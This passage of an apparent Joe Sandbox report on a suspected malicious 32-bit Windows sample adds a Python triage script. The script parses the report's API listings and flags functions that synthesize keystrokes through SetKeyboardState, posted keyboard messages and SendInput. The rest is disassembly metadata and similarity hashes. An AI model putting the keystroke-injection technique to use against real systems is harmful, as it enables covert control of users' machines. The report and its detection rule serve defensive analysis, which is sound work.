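The function at 0044C570..0044C6C2 above is the one listing in this stretch of the report with a security-relevant shape: it rewrites the thread's key-state array (SetKeyboardState), posts WM_KEYDOWN (0x0100), WM_SYSKEYDOWN (0x0104) and WM_CHAR (0x0102) to a window, then calls SendInput with cbSize 0x1C, which is sizeof(INPUT) in a 32-bit process and so matches the x86 image at 0x400000. In other words it synthesizes keystrokes. GUI automation runtimes do exactly the same, so the pattern is a pivot for manual review, not a verdict on its own. The script below is an added example, not Joe Sandbox code and not part of this report: it parses the report's per-function "APIs" lines into structured calls, decodes the uMsg constants, and flags the combination. The two sample listings are copied from the page; the rule, its thresholds and all identifiers are my own assumptions.

```python
"""Triage helper for the per-function "APIs" listings in a Joe Sandbox
disassembly section.  Added example: this is not Joe Sandbox code and not
part of the report.  The two sample listings are copied verbatim from the
report; the rule logic and every name below are my own assumptions."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: the listing at 0044C570..0044C6C2, part of the
# one at 00447BDF, and the argument-less form the report also emits.
KEYBOARD_FUNC = """\
• GetKeyboardState.USER32(?), ref: 0044C570
• SetKeyboardState.USER32(00000080), ref: 0044C594
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
• SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
"""
PAINT_FUNC = """\
• BeginPaint.USER32(00000000,?), ref: 00447BDF
• GetWindowRect.USER32(?,?), ref: 00447C5D
• EndPaint.USER32(?,?), ref: 00447D13
• SendMessageW.USER32 ref: 00471AE3
"""

# "• Import.MODULE(arg,arg,...), ref: ADDR"; the argument list is optional.
LINE_RE = re.compile(
    r"^\W*(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Keyboard window messages (winuser.h values); anything else stays numeric.
WINDOW_MSG = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0102: "WM_CHAR",
              0x0104: "WM_SYSKEYDOWN", 0x0105: "WM_SYSKEYUP"}
MESSAGE_APIS = {"PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA"}
SIZEOF_INPUT_X86 = 0x1C  # sizeof(INPUT) is 28 bytes in a 32-bit process


@dataclass
class Call:
    api: str
    module: str
    args: List[Optional[int]]   # None where the report prints "?"
    ref: int                    # call-site address


def parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)   # handles "-00000068" too


def parse_listing(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [parse_arg(a) for a in raw.split(",")] if raw is not None else []
        calls.append(Call(m.group("api"), m.group("mod"), args,
                          int(m.group("ref"), 16)))
    return calls


def keyboard_messages(calls: List[Call]) -> List[str]:
    """Decode uMsg of Post/SendMessage calls that carry a keyboard message."""
    return [WINDOW_MSG[c.args[1]] for c in calls
            if c.api in MESSAGE_APIS and len(c.args) > 1 and c.args[1] in WINDOW_MSG]


def triage(text: str) -> dict:
    """Flag a function whose API sequence synthesizes keyboard input.
    Rule (assumption): keyboard messages posted to a window, or SendInput,
    or SetKeyboardState rewriting the thread's key-state array."""
    calls = parse_listing(text)
    msgs = keyboard_messages(calls)
    sendinput = [c for c in calls if c.api == "SendInput"]
    sets_state = any(c.api == "SetKeyboardState" for c in calls)
    return {
        "messages": msgs,
        "sets_key_state": sets_state,
        # cbSize == 0x1C only fits the 32-bit INPUT layout
        "sendinput_x86": any(len(c.args) == 3 and c.args[2] == SIZEOF_INPUT_X86
                             for c in sendinput),
        "keystroke_injection": bool(msgs or sendinput or sets_state),
    }


if __name__ == "__main__":
    for label, text in (("0044C570", KEYBOARD_FUNC), ("00447BDF", PAINT_FUNC)):
        print(label, triage(text))
```

Run it over every "APIs" block of a report (the regex accepts the bullet, the optional argument list and the bare `Import.MODULE ref:` form) and sort functions by the flags; the paint routine at 00447BDF comes out clean, the keyboard routine does not. Extend WINDOW_MSG only with constants you have checked against the SDK headers, because a wrong decode here is worse than leaving the value in hex.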
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$_wcscat
                                                      • String ID:
                                                      • API String ID: 2037614760-0
                                                      • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                      • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                      • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                      • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                      • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                      • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                      • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Variant$Copy$AllocClearErrorLastString
                                                      • String ID:
                                                      • API String ID: 960795272-0
                                                      • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                      • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                      • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                      • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                      APIs
                                                      • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                      • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                      • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                      • EndPaint.USER32(?,?), ref: 00447D13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                      • String ID:
                                                      • API String ID: 4189319755-0
                                                      • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                      • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                      • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                      • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                      APIs
                                                      • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                      • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                      • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow$InvalidateRect
                                                      • String ID:
                                                      • API String ID: 1976402638-0
                                                      • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                      • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                      • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                      • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                      APIs
                                                      • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                      • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                      • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                      • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                      • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                      • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                      • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                      • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                      APIs
                                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$Enable$Show$MessageSend
                                                      • String ID:
                                                      • API String ID: 1871949834-0
                                                      • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                      • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                      • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                      • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                      • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                      • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                      • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                      APIs
                                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                      • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                      • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                      • SendMessageW.USER32 ref: 00471AE3
                                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                      • String ID:
                                                      • API String ID: 3611059338-0
                                                      • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                      • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                      • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                      • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: DestroyWindow$DeleteObject$IconMove
                                                      • String ID:
                                                      • API String ID: 1640429340-0
                                                      • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                      • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                      • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                      • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                      APIs
                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                      • _wcslen.LIBCMT ref: 004438CD
                                                      • _wcslen.LIBCMT ref: 004438E6
                                                      • _wcstok.LIBCMT ref: 004438F8
                                                      • _wcslen.LIBCMT ref: 0044390C
                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                      • _wcstok.LIBCMT ref: 00443931
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                      • String ID:
                                                      • API String ID: 3632110297-0
                                                      • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                      • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                      • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                      • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Destroy$DeleteMenuObject$IconWindow
                                                      • String ID:
                                                      • API String ID: 752480666-0
                                                      • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                      • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                      • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                      • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                      • String ID:
                                                      • API String ID: 3275902921-0
                                                      • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                      • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                      • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                      • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                      • String ID:
                                                      • API String ID: 3275902921-0
                                                      • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                      • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                      • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                      • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                      APIs
                                                      • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                      • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
